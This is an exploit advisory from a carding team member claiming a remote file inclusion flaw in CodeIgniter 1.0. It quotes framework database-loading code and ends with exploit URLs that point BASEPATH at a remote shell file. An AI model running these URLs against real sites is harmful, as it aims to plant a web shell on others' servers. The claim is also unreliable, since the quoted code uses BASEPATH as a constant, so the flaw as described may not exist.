###########################################################
###									#
### 		CodeIgniter v1.0 Remote File Inclusion Vulnerability		#
###									#
###########################################################
###
###	* @package	  CodeIgniter
###	* @Version 	  1.0
###	* @license	  http://codeigniter.com/user_guide/license.html
###	* @link		  http://codeigniter.com
###
###########################################################
###
###	Type :	Remote File Inclusion Vulnerability
###	Author:	eidelweiss
###	Date  :	2010-02-13
###	Location:	Indonesia ( http://yogyacarderlink.web.id )
###	Contact:	g1xsystem [at] windowslive [dot] com
###	Greetz : AL-MARHUM - YOGYACARDERLINK TEAM - (D)eal (C)yber
###
###########################################################

POC:
require_once(BASEPATH.'database/DB_driver'.EXT);

	if ( ! isset($active_record) OR $active_record == TRUE)
	{
		require_once(BASEPATH.'database/DB_active_rec'.EXT);

		if ( ! class_exists('CI_DB'))
		{
			eval('class CI_DB extends CI_DB_active_record { }');
		}
	}
	else
	{
		if ( ! class_exists('CI_DB'))
		{
			eval('class CI_DB extends CI_DB_driver { }');
		}
	}

require_once(BASEPATH.'database/drivers/'.$params['dbdriver'].'/'.$params['dbdriver'].'_driver'.EXT);

	// Instantiate the DB adapter
	$driver = 'CI_DB_'.$params['dbdriver'].'_driver';
	$DB =& instantiate_class(new $driver($params));

	if ($DB->autoinit == TRUE)
	{
		$DB->initialize();
	}

	return $DB;
}

###########################################################
###	Exploit:	 /system/database/DB_active_rec.php?BASEPATH=[Shell.txt?]
###		/system/database/DB_driver.php?BASEPATH=[Shell.txt?]
###########################################################